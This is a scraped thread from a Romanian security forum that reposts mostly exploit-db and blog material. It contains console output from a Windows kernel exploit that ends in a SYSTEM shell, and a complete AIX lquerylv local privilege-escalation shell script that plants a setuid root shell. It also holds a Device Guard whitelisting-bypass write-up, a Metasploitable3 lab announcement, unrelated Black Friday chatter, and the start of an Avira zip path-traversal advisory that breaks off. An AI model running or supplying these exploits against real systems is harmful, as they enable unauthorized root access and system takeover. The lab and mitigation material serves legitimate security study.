000000003D9EC780 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC790 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC7F0 | 00 00 00 00 00 00 00 00 67 08 b9 4d 00 00 60 02 | ........g..M..`. 000000003D9EC800 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC810 | 63 f8 ff 3f 01 00 00 00 63 38 88 00 00 00 00 80 | c..?....c8...... 000000003D9EC820 | 63 38 88 00 00 00 00 80 63 38 88 00 00 00 00 80 | c8......c8...... 000000003D9EC830 | 63 38 88 00 00 00 00 80 63 d8 ff 3f 01 00 00 00 | c8......c..?.... 000000003D9EC840 | 63 b8 ff 3f 01 00 00 00 00 00 00 00 00 00 00 00 | c..?............ 000000003D9EC850 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC860 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC870 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC880 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC890 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8C0 | 63 a8 3f 0f 01 00 00 00 00 00 00 00 00 00 00 00 | c.?............. 000000003D9EC8D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC8F0 | 00 00 00 00 00 00 00 00 63 18 35 02 00 00 00 00 | ........c.5..... 000000003D9EC900 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC910 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC920 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC930 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC940 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC950 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC960 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC970 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC980 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC990 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9A0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9B0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9C0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9D0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9EC9F0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA10 | 00 00 00 00 00 00 00 00 63 d8 47 00 00 00 00 00 | ........c.G..... 000000003D9ECA20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECA90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECAF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB20 | 00 00 00 00 00 00 00 00 63 18 8b 00 00 00 00 00 | ........c....... 000000003D9ECB30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECB90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECBF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC20 | 63 78 82 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx.............. 000000003D9ECC30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC50 | 63 b8 57 00 00 00 00 00 00 00 00 00 00 00 00 00 | c.W............. 000000003D9ECC60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECC90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECCF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD60 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECD90 | 63 08 a9 30 01 00 00 00 63 68 c2 2a 00 00 00 00 | c..0....ch.*.... 000000003D9ECDA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECDF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE60 | 63 78 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 | cx.............. 000000003D9ECE70 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE80 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECE90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECED0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEE0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECEF0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF30 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF40 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF50 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECF60 | 67 18 21 00 01 00 00 80 00 00 00 00 00 00 00 00 | g.!............. 000000003D9ECF70 | 00 00 00 00 00 00 00 00 63 10 98 00 00 00 00 00 | ........c....... 000000003D9ECF80 | 63 40 98 00 00 00 00 00 00 00 00 00 00 00 00 00 | c@.............. 000000003D9ECF90 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFA0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFB0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFC0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFD0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ 000000003D9ECFE0 | 63 d8 34 02 00 00 00 00 63 38 8c 00 00 00 00 00 | c.4.....c8...... 000000003D9ECFF0 | 00 00 00 00 00 00 00 00 63 f0 99 00 00 00 00 00 | ........c....... +] Selected spurious PML4E: fffff67b3d9ecf00 +] Spurious PT: fffff67b3d9e0000 +] Content pml4e fffff67b3d9ecff8: 99f063 +] Patching the Spurious Offset with 99f067 +] Content pdpte fffff67b3d9ffff8: 9a0063 +] Patching the Spurious Offset with 9a0067 +] Content pdpte fffff67b3ffffff0: 821063 +] Patching the Spurious Offset with 821067 +] Content pte fffff67fffffe800: 1967 +] Patching the Spurious Offset with 1967 Original HalpIntteruptRequest pointer: fffff80150e1fc40 +] Selected spurious PML4E: fffff67b3d9ecf08 +] Spurious PT: fffff67b3d9e1000 +] Content pml4e fffff67b3d9ecff8: 99f063 +] Patching the Spurious Offset with 99f067 +] Content pdpte fffff67b3d9ffff8: 9a0063 +] Patching the Spurious Offset with 9a0067 +] Content pdpte fffff67b3ffffff0: 821063 +] Patching the Spurious Offset with 821067 +] Content pte fffff67fffffe800: 1967 *** Patching the original location to enable NX... +] Patching the Spurious Offset with 1967 HAL address: fffff67b3d9e1000 +] w00t: Shellcode stored at: ffffffffffd00d50 +] Selected spurious PML4E: fffff67b3d9ecf10 +] Spurious PT: fffff67b3d9e2000 +] Content pml4e fffff67b3d9ecff8: 99f063 +] Patching the Spurious Offset with 99f067 +] Content pdpte fffff67b3d9ffff8: 9a0063 +] Patching the Spurious Offset with 9a0067 +] Content pdpte fffff67b3ffffff0: 821063 +] Patching the Spurious Offset with 821067 +] Content pte fffff67fffffe800: 1967 +] Patching the Spurious Offset with 1967 Patch HalpInterruptController->HalpApicRequestInterrupt: fffff67b3d9e26e8 with ffffffffffd00d50 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Users\qa\Desktop> C:\Users\qa\Desktop>whoami nt authority\system C:\Users\qa\Desktop> Sursa: https://www.exploit-db.com/exploits/40823/

rm -rf shemale Nu m-am uitat.

Am facut curatenie. Cine mai ia toate cele 10 flag-uri?

http://www.go4it.ro/clipuri-virale/sefii-cisco-trebuie-sa-vada-aceasta-reclama-hazlie-a-concurentei-15985655/

E util pentru SEO.

La prima vedere, emag e cel mai serios in materie de reduceri. Desi nu sunt asa cum le prezinta (700% sau 4000 EURO), sunt totusi reduceri.

PS: Multe reduceri false pe evomag...

A inceput la evomag. Edit: Am observat si reduceri fake dar si unele pe bune.

Mi se pare mie sau PCGarage deja nu prea merge?

Fake sau nu, exista posibilitatea ca unele produse chiar sa fie reduse. Am gasit asta: Desi Black Friday incepe oficial la ora 00:00, o parte din magazine au trimis deja ofertele catre o parte din clientii abonati la newsletter, in cazul in care ati ratat o oferta, mai jos am alcatuit o lista cu toate cataloagele disponibile. Lista va fi actalizata in timp real, asadar ramaneti pe pagina. De asemenea vom mentiona si ce produse merita cu adevarat dintre aceste oferte. Actualizriile se vor afla in partea de jos a listei, si vor fi notate cu [UPDATE]. evoMAG Anul acesta pe langa autoturism si alte 25000 de produse, se vor afla si apartamente! Vom reveni cu un catalog in curand! Emag – Microsoft Xbox ONE, 500 GB, stoc 500 de bucati la 599,99 de lei. – Televizor Star-Light 50DM5500, Full HD diagonala de 127CM, stoc 1.000 de bucati la 999,99 de lei. – Perie Rowenta CF9220D0, stoc 5.000 de bucăți la 99,99 de lei. – Anvelopa de iarna Orium 601 185/65 R15 88T, stoc de 3.000 de bucati la 99,99 de lei. – Combina frigorifica Arctic ANK305+, stoc de 1.000 de bucati la 699,99 lei. – Parfum Calvin Klein Euphoria pentru femei, stoc 5.000 de bucati la 119,99 de lei. – Laptop Lenovo IdeaPad cu procesor Intel Core i3, 4GB RAM, HDD 500GB,stoc de 1.000 de bucati la 999,99 de lei. – Samsung GALAXY S6 Edge, memorie 32GB, stoc de 600 de bucati la 1.699,99 de lei. – Tigaie Tefal 24 cm, teflonata, stoc de 8.500 de bucăți la 19,99 de lei. – Telefon Vonino Xylo X,Dual SIM, 8GB, stoc de 1.000 de bucati la 99,99 de lei. – SSD Kingston V300 la 199,99 lei, stoc de 850 de bucati. Rcs-Rds Oferta lor poate fi gasita aici http://www.rcs-rds.ro/goldfriday [UPDATE] Flanco Oferta celor de la Flanco poate fi gasita aici https://zonait.tv/galerie-catalog-flanco-de-black-friday-2016/ Link: https://zonait.tv/iata-ofertele-de-black-friday-2016-live/

Metasploitable3: An Intentionally Vulnerable Machine for Exploit Testing Blog Post created by sinn3r on Nov 15, 2016 Like • Show 2 Likes2 Comment • 0 Test Your Might With The Shiny New Metasploitable3 Today I am excited to announce the debut of our shiny new toy - Metasploitable3. Metasploitable3 is a free virtual machine that allows you to simulate attacks largely using Metasploit. It has been used by people in the security industry for a variety of reasons: such as training for network exploitation, exploit development, software testing, technical job interviews, sales demonstrations, or CTF junkies who are looking for kicks, etc If you are already a Metasploitable fan, you would have noticed that we haven't had a new vulnerable image since 2012. To be honest, when James and I took over the project, we didn't even know who was maintaining it anymore. So we decided to do something about it. After months of planning and building the vulnerable image from scratch, we have something for you all to play Unlike its predecessor, Metasploitable3 has these cool features: It is Open Source During development, we recognized one of the drawbacks of Metasploitable2 was maintenance. We figured since we want everyone in the community to play, the community should have the power to influence and contribute. This also allows the vulnerable image to constantly evolve, and hopefully will keep the VM fun to play. Metasploitable3 can be found as a Github repository here. Keep in mind, instead of downloading a VM like before, Metasploitable3 requires you to issue a few commands and build for Virtual Box (VMWare will be supported in the future soon). To do so, your machine must install the following requirements: Packer Vagrant Vagrant Reload Plugin VirtualBox To build automatically: Run the build_win2008.sh script if using bash. If you are using Windows, run build_win2008.ps1. If the command completes successfully, run "vagrant up". The the build process takes anywhere between 20 to 40 minutes, depending on your system and Internet connection. After it's done, you should be able to open the VM within VirtualBox and login. The default username is "vagrant" with password "vagrant". To build manually, please refer to the README documentation. If you have experience in making vulnerable images, or would like to suggest a type of exploitation scenario for Metasploitable3, your feedback is welcome! It is for People with Different Skills Levels Metasploitable2 back then was more of a test environment heavily for Metasploit. It was straight-forward to play, and it didn't take long to find the right exploit to use, and get a high privileged shell. But you see, we want to make you try a little harder than that First off, not every type of vulnerability on Metasploitable3 can be exploited with a single module from Metasploit, but some can. Also by default, the image is configured to make use of some mitigations from Windows, such as different permission settings and a firewall. For example, if you manage to exploit a service in the beginning, you will most likely be rewarded with a lower privileged shell. This part shouldn't be too difficult for young bloods who are new to the game. But if you want more than that, higher privileged services tend to be protected by a firewall, and you must figure out how to get around that. For special reasons, the firewall can be disabled if you set the MS3_DIFFICULTY environment variable: $ MS3_DIFFICULTY=easy vagrant up If the image is already built, you can simply open a command prompt and do: $ netsh advfirewall set allprofiles state off It Has Flags One very common thing about performing a penetration test is going after corporate data. Well, we can't shove any real corporate data in Metasploitable3 without any legal trouble, therefore we have introduced flags throughout the whole system. They serve as "data you want to steal", and each is in the form of a poker card image of a Rapid7/Metasploit developer, and is packaged in one of more of these ways: Obfuscation Strict permission settings File attributes Embedded files Getting your hands on these flags exercises your post exploitation muscle, and may require some level of reverse engineering knowledge. A hint about these flags can be found from one of the services. In the future, we will be publishing more blog posts about how to find these flags. It is Expandable In real world penetration testing, a lot of it involves being able to break into one machine, and leverage the information stolen from there against the next one. Stolen passwords and hashes are perfect examples for this. Instead of just having one virtual machine, our plan is to also have the capability to build multiple vulnerable images, and create a network of them. This allows the audience to have the opportunity to practice more post exploitation techniques, pivoting, and break into the next box. Although our first image is Windows, the planning part of the Linux version has already begun. If you would like to jump on this train, please feel free to leave a comment on Github, or contribute. And that's what our new toy is all about Last but not least, if you are trying out Metasploitable3 without Metasploit, either you are Neo from the Matrix, or you are nuts. Metasploit consists of thousands of modules, including exploits, auxiliary, post modules, and payloads that allows you to succeed in many kinds of attack scenarios. If you don't have this in your toolkit, please feel free to grab it here. Sursa: https://community.rapid7.com/community/metasploit/blog/2016/11/15/test-your-might-with-the-shiny-new-metasploitable3

BYPASSING APPLICATION WHITELISTING BY USING DNX.EXE November 17, 2016 by enigma0x3 Over the past few weeks, I have had the pleasure to work side-by-side with Matt Graeber (@mattifestation) and Casey Smith (@subtee) researching Device Guard user mode code integrity (UMCI) bypasses. If you aren’t familiar with Device Guard, you can read more about it here: https://technet.microsoft.com/en-us/itpro/windows/keep-secure/device-guard-deployment-guide. In short, Device Guard UMCI prevents unsigned binaries from executing, restricts the Windows Scripting Host, and it places PowerShell in Constrained Language mode. Recently, @mattifestation blogged about a typical Device Guard scenario and using theMicrosoft Signed debuggers WinDbg/CDB as shellcode runners. Soon after, @subtee released a post on using CSI.exe to run unsigned C# code on a Device Guard system. Taking their lead, I decided to install the Visual Studio Enterprise trial and poke around to see what binaries existed. After much digging, I stumbled across dnx.exe, which is the Microsoft .NET Execution environment. If you are curious, you can read more on dnx.exe here: https://blogs.msdn.microsoft.com/sujitdmello/2015/04/23/step-by-step-installation-instructions-for-getting-dnx-on-your-windows-machine/ In a Device Guard scenario, dnx.exe is allowed to execute as it is a Microsoft signed binary packaged with Visual Studio Enterprise. In order to execute dnx.exe on a Device Guard system (assuming it isn’t already installed), you will need to gather dnx.exe and its required dependencies, and somehow transport everything to your target (this is an exercise left up to the reader). With everything required now on our target host, we can now start down the path of bypassing Device Guard’s UMCI. Since dnx.exe allows for executing code in dynamic scenarios, we can use it to execute arbitrary, unsigned C# code. Fortunately, there is a solid example of this on Microsoft’s blog above. For example, we can create a C# file called “Program.cs” and add whatever C# code we want. To demonstrate the execution of unsigned code, we can keep things simple: To satisfy the requirements of dnx.exe, a Project.json file is required, which specifies some of the requirements when executing the code. For this PoC, the example “Project.json” file can be used from Microsoft’s blog here. As stated in their post, we can execute our C# by placing “Program.cs” and “Project.json” in a folder called “ConsoleApp” (this can obviously be renamed/modified). Now that we have our files, we can execute our C# using dnx.exe by going into the “ConsoleApp” folder and invoking dnx.exe on it. This is done on a PC running Device Guard: As you can see above, our unsigned C# successfully executed and is running inside of dnx.exe. Fortunately, these “misplaced trust” bypasses can be mitigated via code integrity policy FilePublisher file rules. You can read up on creating these mitigation rules here: http://www.exploit-monday.com/2016/09/using-device-guard-to-mitigate-against.html You can find a comprehensive bypass mitigation policy here: https://github.com/mattifestation/DeviceGuardBypassMitigationRules Cheers! Matt Nelson Sursa: https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

Introducing Firefox Focus – a free, fast and easy to use private browser for iOS Nick Nguyen November 17, 2016 Today, we’re pleased to announce the launch of Firefox Focus – a free, fast and easy to use private browser for iOS. Firefox Focus We live in an age where too many users have lost trust and lack meaningful controls over their digital lives. For some users, it seems as though your web activities can follow you everywhere – across devices, across accounts. To make matters worse, the web can often feel cluttered. That’s why we are introducing Firefox Focus. For the times when you don’t want to leave a record on your phone. You may be looking for information that in certain situations is sensitive – searches for engagement rings, flights to Las Vegas or expensive cigars, for example. And sometimes you just want a super simple, super fast Web experience – no tabs, no menus, no pop-ups. Firefox Focus gives you just that. Firefox Focus is set by default to block many of the trackers that follow you around the Web. You don’t need to change privacy or cookie settings. You can browse with peace of mind, feeling confident in the knowledge that you can instantly erase your sessions with a single tap – no menus needed. Firefox Focus Erase Button Much of what makes mobile web pages slow is the technology used to track users on the web. Because Firefox Focus blocks these trackers, it is likely you’ll notice a performance boost on the many sites that track your behavior. When you occasionally see a site that doesn’t work because it is dependent on tracking, and if you don’t mind that kind of tracking, Firefox Focus makes it easy to open your current site in either Firefox or Safari. We look forward to your feedback on Firefox Focus. You can download Firefox Focus from the App Store. Firefox Focus continues to operate as a Safari content blocker on iOS, and users will be able to take advantage of Tracking Protection on both Safari and Firefox Focus. Sursa: https://blog.mozilla.org/blog/2016/11/17/introducing-firefox-focus-a-free-fast-and-easy-to-use-private-browser-for-ios/

Toate au nevoie de Siri. Oare cati au acea porcarie activata?

Nici nu e prima oara cand se descopera asa ceva...

IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation #!/usr/bin/sh # # AIX lquerylv 5.3, 6.1, 7.1, 7.2 local root exploit. Tested against latest patchset (7100-04) # # This exploit takes advantage of known issues with debugging functions # within the AIX linker library. We are taking advantage of known # functionality, and focusing on badly coded SUID binaries which do not # adhere to proper security checks prior to seteuid/open/writes. # # The CVEs we will be taking advantage of: # - CVE-2009-1786: The malloc subsystem in libc in IBM AIX 5.3 and 6.1 allows # local users to create or overwrite arbitrary files via a symlink attack on # the log file associated with the MALLOCDEBUG environment variable. # # - CVE-2009-2669: A certain debugging component in IBM AIX 5.3 and 6.1 does # not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE # environment variables, which allows local users to gain privileges by # leveraging a setuid-root program to create an arbitrary root-owned file # with world-writable permissions, related to libC.a (aka the XL C++ runtime # library) in AIX 5.3 and libc.a in AIX 6.1. # # - CVE-2014-3074: Runtime Linker Allows Privilege Escalation Via Arbitrary # File Writes In IBM AIX. # # In each instance of the aforementioned CVEs, IBM merely patched the binaries # which were reported in the original reports as being used for escalation of # the vulnerabilities. This allowed for the lquerylv binary to slip by their # patches and become an attack vector. # # Blog post URL: https://rhinosecuritylabs.com/2016/11/03/unix-nostalgia-hunting-zeroday-vulnerabilities-ibm-aix/ # # lqueryroot.sh by @hxmonsegur [2016 //RSL] ROOTSHELL=/tmp/shell-$(od -N4 -tu /dev/random | awk 'NR==1 {print $2} {}') APP=$0 function usage { echo "Usage: $APP [1] | [2] | [3]" echo echo "1 - MALLOCDEBUG file write -> escalation" echo "2 - _LIB_INIT_DBG_FILE file write -> escalation" echo "3 - MALLOCBUCKETS file write -> escalation" echo echo "[lquerylv] AIX 5.3/6.1/7.1/7.2 Privilege escalation by @hxmonsegur //RSL" exit } function CVE20091786 { echo "[*] Exporting MALLOCDEBUG environment variable" MALLOCTYPE=debug MALLOCDEBUG=report_allocations,output:/etc/suid_profile export MALLOCTYPE MALLOCDEBUG } function CVE20092669 { echo "[*] Exporting _LIB_INIT_DBG_FILE environment variable" _LIB_INIT_DBG=1 _LIB_INIT_DBG_FILE=/etc/suid_profile export _LIB_INIT_DBG _LIB_INIT_DBG_FILE } function CVE20143074 { echo "[*] Exporting MALLOCBUCKETS environment variable" MALLOCOPTIONS=buckets MALLOCBUCKETS=number_of_buckets:8,bucket_statistics:/etc/suid_profile export MALLOCOPTIONS MALLOCBUCKETS } if [ -z "$1" ]; then usage exit 1 fi while [ "$1" != "" ]; do case $1 in 1 ) CVE20091786;; 2 ) CVE20092669;; 3 ) CVE20143074;; * ) usage break;; esac shift done if [ ! -x "/usr/sbin/lquerylv" ]; then echo "[-] lquerylv isn't executable. Tough luck." exit 1 fi echo "[*] Setting umask to 000" umask 000 echo "[*] Execute our vulnerable binary" /usr/sbin/lquerylv >/dev/null 2>&1 if [ ! -e "/etc/suid_profile" ]; then echo "[-] /etc/suid_profile does not exist and exploit failed." exit 1 fi echo "[*] Cleaning up /etc/suid_profile" echo > /etc/suid_profile echo "[*] Current id: `/usr/bin/id`" echo "[*] Adding payload" cat << EOF >/etc/suid_profile cp /bin/ksh $ROOTSHELL /usr/bin/syscall setreuid 0 0 chown root:system $ROOTSHELL chmod 6755 $ROOTSHELL rm /etc/suid_profile EOF echo "[*] Unsetting env" unset MALLOCBUCKETS MALLOCOPTIONS _LIB_INIT_DBG_FILE _LIB_INIT_DBG MALLOCDEBUG MALLOCTYPE echo "[*] Executing ibstat for fun and profit" /usr/bin/ibstat -a >/dev/null 2>&1 if [ ! -e "$ROOTSHELL" ]; then echo "[-] Rootshell does not exist and exploit failed." exit 1 fi echo "[*] Executing rootshell" $ROOTSHELL Sursa: https://www.exploit-db.com/exploits/40710/

Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution # Title : Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM) # Date : 08/11/2016 # Author : R-73eN # Tested on: Avira Antivirus 15.0.21.86 in Windows 7 # Vendor : https://www.avira.com/ # Disclosure Timeline: # 2016-06-28 - Reported to Vendor through Bugcrowd. # 2016-06-29 - Vendor Replied. # 2016-07-05 - Vendor Replicated the vulnerability. # 2016-09-02 - Vendor released updated version which fix the vulnerability. # 2016-11-08 - Public Disclosure # I would like to thank Avira security team for the quick response. # # Vulnerability Description: # When the Avira Launcher manual update imports a zip file doesn't checks for " ../ " # characters which makes it possible to do a path traversal and write anywhere in the system. # Vulnerability Replication # 1. Create a special crafted zip file with the python script attached. # 2. The script will create a zip file named xvdf_fusebundle.zip with a filename test.bat (this can be changed) and will write this file to the root directory 